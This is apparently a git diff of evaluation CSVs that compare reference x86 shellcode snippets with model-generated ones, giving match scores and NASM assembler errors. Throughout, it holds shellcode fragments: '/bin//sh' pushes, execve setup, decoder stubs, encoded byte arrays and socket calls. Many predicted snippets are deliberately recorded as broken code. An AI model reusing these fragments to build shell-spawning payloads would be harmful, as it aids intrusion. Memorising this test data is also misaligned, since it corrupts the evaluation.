\\n mov edx, esp;1 +inc esi;inc esi;1 +mov esi, eax;mov esi, eax;1 +shr ax, cl;cmp ax, cl;0 +cmp eax, ebx;cmp ebx, eax;GT: errorGenEXE +section .text \\n _start:;section .data, _start;GT: errorGenEXE +dec byte dl;dec dl;GT: errorGenEXE +jmp callpop;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;GT: errorGenEXE +mov eax, 2;mov eax, 0x68732f2f \\n mov eax, 0x6e69622f;GT: errorGenEXE +sub esp, 0x7f;sub 0x7f, 0x7f;0 +push 0x706d742f;push 0x706d742f;1 +xor byte [esi], 0x97;xor byte [esi], 0x97;1 +mov al, 0x5;mov al, 0x68732f2f \\n mov al, 0x6e69622f;GT: errorGenEXE +inc ebx;inc ebx;1 +mul ebx;xor eax, eax;GT: errorGenEXE +mov ax, 0x16b;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov ax, esp;0 +xor eax,eax \\n xor ebx,ebx;xor eax, eax \\n xor ebx, ebx;1 +push 0x706d742f;push 0x706d742f;1 +push word 0x1b6 \\n pop ecx;mov ecx, read-write;0 +loop fill;loop ecx \\n xor var1, var1 \\n xor unless, unless \\n xor decrementing, decrementing;0 +push dword eax;push dword eax;1 +shellcode:;shellcode:;1 +neg eax;not eax;GT: errorGenEXE +mov dword [esp-12], 0x6374652f;mov dword [[], 0x6374652f;0 +push 0x7461632f \\n push 0x6e69622f \\n mov edx, esp;push 0x7461632f \\n push 0x6e69622f \\n mov edx, esp;1 +push 0x04020a0a;push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f;GT: errorGenEXE +mul [var];mul 32-bit;0 +lea ebx, [ebp+39];push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov ebx, esp;GT: errorGenEXE +mov rcx, 0x68732f2f6e69622f;push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov rcx, esp;0 +mov cx, 0x401;mov cx, 0x401;1 +cmp bh, al;cmp bh, al;1 +push 0x7665642f;push 0x7665642f;1 +jmp short shellcode_section;jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero68732f \\n jmp zero6e69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f \\n jmp zero69622f;GT: errorGenEXE +ja write;jge write;GT: errorGenEXE +mov ecx, 4294948047;mov ecx, 4294948047;1 +mov al, 0x2e;push setgid \\n pop = \\n pop 0x2e;0 +mov ecx, esp;push trasnfer \\n pop ecx;GT: errorGenEXE +jmp short stage;jmp short stage;1 +je short loc_402b13;cmp loc_402b13, loc_402b13 \\n je loc_402b13;0 +pop ebx;push byte 0x68732f2f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov ebx, esp;GT: errorGenEXE +mov ecx, esp;pop ecx;GT: errorGenEXE +mov eax, 0x50905090;push byte 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x50905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x509050905090 \\n push 0x5090509050905090 \\n push 0x5090;GT: errorGenEXE +push byte 0x1 \\n pop edx;push byte 0x1 \\n pop edx;1 +shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23;shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23;1 +pop ecx;pop ecx;1 +jmp nextchar;jmp code;GT: errorGenEXE +jz download;jz download;1 +push 0x3 \\n pop ebx;push sys_connect \\n pop = \\n pop ebx;0 +mov esi, esp;mov esi, esp;1 +cmp eax,ebx \\n je exit;cmp eax, ebx \\n je _exit;GT: errorGenEXE +push dword eax;push dword eax;1 +add byte [esi], 0x02;add byte [esi], 0x02;1 +mov [ebp+20], zero_reg;mov zero_reg, [[];0 +push edx \\n push esi \\n push edi \\n push ebx \\n mov ecx, esp;push edx \\n push esi \\n push edi \\n push ebx \\n mov ecx, esp;1 +pop eax;pop eax;1 +zero1b:;_zero1b:;GT: errorGenEXE +mov eax, 65;mov eax, 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f;GT: errorGenEXE +jmp short formatting;jmp short formatting;1 +xchg ebx,eax;xchg ebx, eax;1 +jmp edi;jmp edi;1 +xor edx, edx \\n mul edx;xor eax, eax \\n mul eax;GT: errorGenEXE +xor ax, 0x539;xor ax, 0x539;1 +sub eax, 8;sub eax, 8;1 +push 0x61622f6e;push 0x61622f6e;1 +push dx;push dx;1 +mov ecx,esp;mov ecx, esp;1 +notdecode:;notdecode:;1 +jmp read;jmp read;1 +push word 0x776f;push word 0x776f;1 +push 0x68732f2f \\n push 0x68732f2f \\n push 0x2f656c2d;push ' -le///sh//sh';GT: errorGenEXE +child:;child:;1 +mov edx, response;mov edx, response;1 +scasd \\n l1 IncAddr;cmp DWORD [eax], edi \\n jne l1;GT: errorGenEXE +mov esi, 0x353ffc3b;mov esi, 0x353ffc3b;1 +_ip equ 0x0100007f;ip equ 0x0100007f;GT: errorGenEXE +lea edx, [ebx+12];lea edx, [ebx+12];1 +pop esi;mov esi, word [esi];0 +xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx;xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx;1 +add edx, 32;add edx, 32;1 +xor eax, eax \\n mov ebx, eax \\n mov ecx, eax \\n mov edx, eax;xor eax, eax \\n xor ebx, ebx \\n xor ecx, ecx \\n xor edx, edx;GT: errorGenEXE +mov byte [esi + 1], dl;mov dl, byte [esi+1];GT: errorGenEXE +push 0xb \\n pop eax;push __nr_execve \\n pop eax;GT: errorGenEXE +or eax, 0xffffffff \\n not eax \\n push eax;mov eax, value -1 \\n not eax;GT: errorGenEXE +mov bl, 3 \\n dec bl \\n jnz l3;mov bl, 3 \\n dec bl \\n jnz l3;1 +call decoder \\n shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01;jmp shellcode;GT: errorGenEXE +mov al, 0x8;push byte 0x8 \\n pop 0x8;0 +shr bl, 4;shr bl, 4;1 +push 0x746f6f72;push 0x746f6f72;1 +xor eax, eax \\n mov al, 6;xor eax, eax \\n mov numebr, esp;0 +ja exi;jge exi;GT: errorGenEXE +mov ecx, 0x1;mov ecx, 0x1;1 +mov eax, [ebx+esi*2+4];mov eax, [ebx+esi*2+4];1 +_start: \\n jmp short call_shellcode;_start: \\n jmp short call_shellcode;1 +mov edx, dword 0x65676760;mov edx, 0x65676760;GT: errorGenEXE +xor ecx, ecx;xor ecx, ecx;1 +sub eax, 3;dec eax;GT: errorGenEXE +_file:;_file_label:;GT: errorGenEXE +int 0x80;int 80h;GT: errorGenEXE +push dword 0x3a303a3a;push dword 0x3a303a3a;1 +cmp BYTE al, 2 \\n je do_inject;cmp al, 2 \\n jne do_inject;GT: errorGenEXE +movq mm3, qword [esi];mov mm3, \shellcode\;0 +je exit;jne exit;GT: errorGenEXE +mov byte [edi], bl;mov byte [edi], bl;1 +xchg edi,eax;xchg edi, eax;1 +push eax \\n mov edx,esp;"push edx \\n push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x +";GT: errorGenEXE diff --git a/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/Filtered Snipptes/output_syntactic_analysis_errors_assembly_test_output.csv b/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/Filtered Snipptes/output_syntactic_analysis_errors_assembly_test_output.csv new file mode 100644 index 0000000000000000000000000000000000000000..01e0717062e9d9e6eb33ecb5a47c6470268f87c2 --- /dev/null +++ b/ACCA/Output/Output_Syntactic_Analysis/assembly_test_output/Filtered Snipptes/output_syntactic_analysis_errors_assembly_test_output.csv @@ -0,0 +1,319 @@ +Predicted Snippets;NASM Output Errors +0x0b equ 0x0b;"assembly_instruction.asm:1: error: label or instruction expected at start of line +" +=15:;"assembly_instruction.asm:1: error: label or instruction expected at start of line +" +ebx:;"assembly_instruction.asm:1: error: label or instruction expected at start of line +" +bl: not bl \\n inc bl \\n inc bl;"assembly_instruction.asm:1: error: label or instruction expected at start of line +" +mov al, edi;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push bin/sh \\n push ebx;"assembly_instruction.asm:1: error: division operator may only be applied to scalar values +" +push [\\n pop eax \\n pop ecx;"assembly_instruction.asm:1: error: expression syntax error +" +0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80 db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73, 0x2f, 0x68, 0x69, 0x62, 0x87, 0x6e, 0xb0, 0xe3, 0xcd, 0x0b, 0x90, 0x80;"assembly_instruction.asm:1: error: label or instruction expected at start of line +" +push 0x68732f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov linefeed, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:9: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:10: error: invalid combination of opcode and operands +" +inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc;"assembly_instruction.asm:26: error: invalid combination of opcode and operands +" +inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0 \\n inc var0;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +assembly_instruction.asm:2: error: invalid combination of opcode and operands +assembly_instruction.asm:3: error: invalid combination of opcode and operands +assembly_instruction.asm:4: error: invalid combination of opcode and operands +assembly_instruction.asm:5: error: invalid combination of opcode and operands +assembly_instruction.asm:6: error: invalid combination of opcode and operands +assembly_instruction.asm:7: error: invalid combination of opcode and operands +assembly_instruction.asm:8: error: invalid combination of opcode and operands +assembly_instruction.asm:9: error: invalid combination of opcode and operands +assembly_instruction.asm:10: error: invalid combination of opcode and operands +assembly_instruction.asm:11: error: invalid combination of opcode and operands +assembly_instruction.asm:12: error: invalid combination of opcode and operands +assembly_instruction.asm:13: error: invalid combination of opcode and operands +assembly_instruction.asm:14: error: invalid combination of opcode and operands +assembly_instruction.asm:15: error: invalid combination of opcode and operands +assembly_instruction.asm:16: error: invalid combination of opcode and operands +assembly_instruction.asm:17: error: invalid combination of opcode and operands +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov filecontents, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: error: invalid combination of opcode and operands +" +push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov bl, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: error: invalid combination of opcode and operands +" +pop we;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n push dword for \\n;"assembly_instruction.asm:18: error: comma, colon, decorator or end of line expected after operand +" +push temrinated \\n push '/bin//sh' \\n push ebx \\n push edx \\n push temrinated \\n push '/bin//sh' \\n push ebx \\n mov edx, esp;"assembly_instruction.asm:2: warning: character constant too long [-w+other] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: character constant too long [-w+other] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +" +xor ax, bx \\n jz call decoded;"assembly_instruction.asm:2: error: comma, colon, decorator or end of line expected after operand +" +numeric 0x68732f2f \\n int 0x68732f \\n int 0x6e69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f \\n int 0x69622f;"assembly_instruction.asm:1: error: parser: instruction expected +" +push of /bin/sh \\n push eip \\n mov shellcode_label, esp;"assembly_instruction.asm:1: error: division operator may only be applied to scalar values +" +inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc esi \\n inc;"assembly_instruction.asm:26: error: invalid combination of opcode and operands +" +reate: \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n push 0x77 \\n mov 0x77, 0x;"assembly_instruction.asm:21: error: invalid combination of opcode and operands +" +inc L2 \\n jmp L2;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +mov mm0, \xor_value\;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +xor 0x17, 0x17;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +mov esi+35, esi;"assembly_instruction.asm:1: error: invalid register set size +" +buffersize word 0x68732f \\n 0x68732f \\n 0x6e69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0x69622f \\n 0;"assembly_instruction.asm:1: error: parser: instruction expected +assembly_instruction.asm:2: error: label or instruction expected at start of line +assembly_instruction.asm:3: error: label or instruction expected at start of line +assembly_instruction.asm:4: error: label or instruction expected at start of line +assembly_instruction.asm:5: error: label or instruction expected at start of line +assembly_instruction.asm:6: error: label or instruction expected at start of line +assembly_instruction.asm:7: error: label or instruction expected at start of line +assembly_instruction.asm:8: error: label or instruction expected at start of line +assembly_instruction.asm:9: error: label or instruction expected at start of line +assembly_instruction.asm:10: error: label or instruction expected at start of line +assembly_instruction.asm:11: error: label or instruction expected at start of line +assembly_instruction.asm:12: error: label or instruction expected at start of line +assembly_instruction.asm:13: error: label or instruction expected at start of line +assembly_instruction.asm:14: error: label or instruction expected at start of line +assembly_instruction.asm:15: error: label or instruction expected at start of line +assembly_instruction.asm:16: error: label or instruction expected at start of line +" +push 0-term \\n push cn/n \\n push ib//;"assembly_instruction.asm:3: error: expression syntax error +" +push 0x1ff9090 \\n push ecx \\n push 0x10 \\n push 0x1ff9090 \\n push ecx \\n push 0x10 \\n mov 0x10, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: error: invalid combination of opcode and operands +" +for: \\n 12*10: \\n quad-bytes:;"assembly_instruction.asm:2: error: label or instruction expected at start of line +assembly_instruction.asm:3: error: parser: instruction expected +" +inc R1 \\n inc esi;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +xor 0x2c, esi;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +mov ebx, ptr;"assembly_instruction.asm:1: warning: `ptr' is not a NASM keyword [-w+ptr] +assembly_instruction.asm:3: warning: `ptr' is not a NASM keyword [-w+ptr] +" +0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73 db 0xc0, 0x31, 0x68, 0x50, 0x2f, 0x2f, 0x68, 0x73;"assembly_instruction.asm:1: error: label or instruction expected at start of line +" +mov eax, ASCII /bin/sh;"assembly_instruction.asm:1: error: division operator may only be applied to scalar values +" +xor shellcode_length, shellcode_length \\n mov byte [shellcode_length], shellcode_length;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +mov dword [[], esi;"assembly_instruction.asm:1: error: expression syntax error +" +mov esi, al;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +decode_pr: \\n inc decode_pr;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +" +push socket_type \\n push = \\n push sock_stream;"assembly_instruction.asm:2: error: expression syntax error +" +add ax, di + 20;"assembly_instruction.asm:1: error: invalid register set size +" +pop ecx \\n pop stak \\n mov edi, esp;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +" +backup al;"assembly_instruction.asm:1: error: parser: instruction expected +" +_ priv_setgid:;"assembly_instruction.asm:1: error: parser: instruction expected +" +mov: \\n =: \\n var2: \\n sys_listen: \\n bl:;"assembly_instruction.asm:2: error: label or instruction expected at start of line +assembly_instruction.asm:5: error: label or instruction expected at start of line +" +mov ecx, ptr;"assembly_instruction.asm:1: warning: `ptr' is not a NASM keyword [-w+ptr] +assembly_instruction.asm:3: warning: `ptr' is not a NASM keyword [-w+ptr] +" +ebx:;"assembly_instruction.asm:1: error: label or instruction expected at start of line +" +push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n push 15152 \\n;"assembly_instruction.asm:21: error: comma, colon, decorator or end of line expected after operand +" +mov sys_read, esp;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push [\\n pop ebp-4 \\n pop] \\n pop ebx;"assembly_instruction.asm:1: error: expression syntax error +assembly_instruction.asm:3: error: expression syntax error +" +edx:;"assembly_instruction.asm:1: error: label or instruction expected at start of line +" +push proc/sys/kernel/randomize_va_space \\n push eax \\n mov ebx, esp;"assembly_instruction.asm:1: error: division operator may only be applied to scalar values +" +push [\\n pop esi +4;"assembly_instruction.asm:1: error: expression syntax error +" +mov eax, byte [ebx+8];"assembly_instruction.asm:1: error: mismatch in operand sizes +" +bound ebx, 0x68732f2f, 0x6e69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f, 0x69622f;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +mov breakpoint, esp;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push sizeof(struct;"assembly_instruction.asm:1: error: comma, colon, decorator or end of line expected after operand +" +pop bl;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push sys \\n push for \\n push dup2 \\n mov al, 0x68732f2f \\n mov dup2, 0x6e69622f \\n mov for, 0x69622f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f2f \\n mov dup2, 0x69622f \\n mov dup2, 0x69622f \\n mov for, 0x69622f;"assembly_instruction.asm:4: warning: byte data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: invalid combination of opcode and operands +assembly_instruction.asm:6: error: invalid combination of opcode and operands +assembly_instruction.asm:7: error: invalid combination of opcode and operands +assembly_instruction.asm:8: error: invalid combination of opcode and operands +assembly_instruction.asm:9: error: invalid combination of opcode and operands +assembly_instruction.asm:10: error: invalid combination of opcode and operands +assembly_instruction.asm:11: error: invalid combination of opcode and operands +assembly_instruction.asm:12: error: invalid combination of opcode and operands +" +cmp al, ecx \\n jz found \\n inc ecx;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push 0-term \\n push daeh \\n push rsu/ on;"assembly_instruction.asm:3: error: division operator may only be applied to scalar values +" +xor 0xffffffff, 0xffffffff \\n xor eax, eax;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +mov esi, al;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push eax(socket;"assembly_instruction.asm:1: error: comma, colon, decorator or end of line expected after operand +" +push byte 0x68732f2f \\n push byte 0x68732f \\n push byte 0x6e69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n push byte 0x69622f \\n mov uninitialized, esp;"assembly_instruction.asm:1: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: signed byte value exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: error: invalid combination of opcode and operands +" +xor until, until \\n sub until, 0x68732f2f \\n sub until, 0x6e69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x69622f \\n xor until, 0x;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +assembly_instruction.asm:2: error: invalid combination of opcode and operands +assembly_instruction.asm:3: error: invalid combination of opcode and operands +assembly_instruction.asm:4: error: invalid combination of opcode and operands +assembly_instruction.asm:5: error: invalid combination of opcode and operands +assembly_instruction.asm:6: error: invalid combination of opcode and operands +assembly_instruction.asm:7: error: invalid combination of opcode and operands +assembly_instruction.asm:8: error: invalid combination of opcode and operands +assembly_instruction.asm:9: error: invalid combination of opcode and operands +assembly_instruction.asm:10: error: invalid combination of opcode and operands +assembly_instruction.asm:11: error: invalid combination of opcode and operands +" +push ecx \\n push cotent \\n push 'hsab' \\n push '/nib' \\n push '////';"assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +" +inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc _appendfile \\n inc istruction \\n inc istruction \\n inc istruction \\n inc istruction \\n inc pf;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +assembly_instruction.asm:2: error: invalid combination of opcode and operands +assembly_instruction.asm:3: error: invalid combination of opcode and operands +assembly_instruction.asm:4: error: invalid combination of opcode and operands +assembly_instruction.asm:5: error: invalid combination of opcode and operands +assembly_instruction.asm:6: error: invalid combination of opcode and operands +assembly_instruction.asm:7: error: invalid combination of opcode and operands +assembly_instruction.asm:8: error: invalid combination of opcode and operands +assembly_instruction.asm:9: error: invalid combination of opcode and operands +assembly_instruction.asm:10: error: invalid combination of opcode and operands +assembly_instruction.asm:11: error: invalid combination of opcode and operands +assembly_instruction.asm:12: error: invalid combination of opcode and operands +assembly_instruction.asm:13: error: invalid combination of opcode and operands +assembly_instruction.asm:14: error: invalid combination of opcode and operands +assembly_instruction.asm:15: error: invalid combination of opcode and operands +assembly_instruction.asm:16: error: invalid combination of opcode and operands +assembly_instruction.asm:17: error: invalid combination of opcode and operands +assembly_instruction.asm:18: error: invalid combination of opcode and operands +" +test efault, efault \\n jmp next_page;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push 0x68732f2f \\n push 0x68732f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n push 0x69622f \\n mov my_table, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:6: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:7: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:8: error: invalid combination of opcode and operands +" +pop that;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +sub var2, esi;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +mov ebx, edx+0x4;"assembly_instruction.asm:1: error: invalid register set size +" +edx: \\n dword ptr 0x68732f2f \\n dword ptr 0x68732f \\n dword ptr 0x6e69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x69622f \\n dword ptr 0x696;"assembly_instruction.asm:1: error: label or instruction expected at start of line +assembly_instruction.asm:2: error: label or instruction expected at start of line +assembly_instruction.asm:3: error: label or instruction expected at start of line +assembly_instruction.asm:4: error: label or instruction expected at start of line +assembly_instruction.asm:5: error: label or instruction expected at start of line +assembly_instruction.asm:6: error: label or instruction expected at start of line +assembly_instruction.asm:7: error: label or instruction expected at start of line +assembly_instruction.asm:8: error: label or instruction expected at start of line +assembly_instruction.asm:9: error: label or instruction expected at start of line +assembly_instruction.asm:10: error: label or instruction expected at start of line +assembly_instruction.asm:11: error: label or instruction expected at start of line +assembly_instruction.asm:12: error: label or instruction expected at start of line +" +push 0x3 \\n pop bl;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +" +push 63 \\n pop 63;"assembly_instruction.asm:2: error: invalid combination of opcode and operands +" +cmp ax, cl;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +sub 0x7f, 0x7f;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov ax, esp;"assembly_instruction.asm:1: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:2: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:3: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:4: warning: word data exceeds bounds [-w+number-overflow] +assembly_instruction.asm:5: error: invalid combination of opcode and operands +" +mov ecx, read-write;"assembly_instruction.asm:1: error: symbol `write' not defined +" +loop ecx \\n xor var1, var1 \\n xor unless, unless \\n xor decrementing, decrementing;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +assembly_instruction.asm:2: error: invalid combination of opcode and operands +assembly_instruction.asm:3: error: invalid combination of opcode and operands +assembly_instruction.asm:4: error: invalid combination of opcode and operands +" +mov dword [[], 0x6374652f;"assembly_instruction.asm:1: error: expression syntax error +" +mul 32-bit;"assembly_instruction.asm:1: error: invalid combination of opcode and operands +" +push 0x68732f2f \\n push 0x6e69622f \\n push 0x69622f \\n push 0x69622f \\n mov rcx, 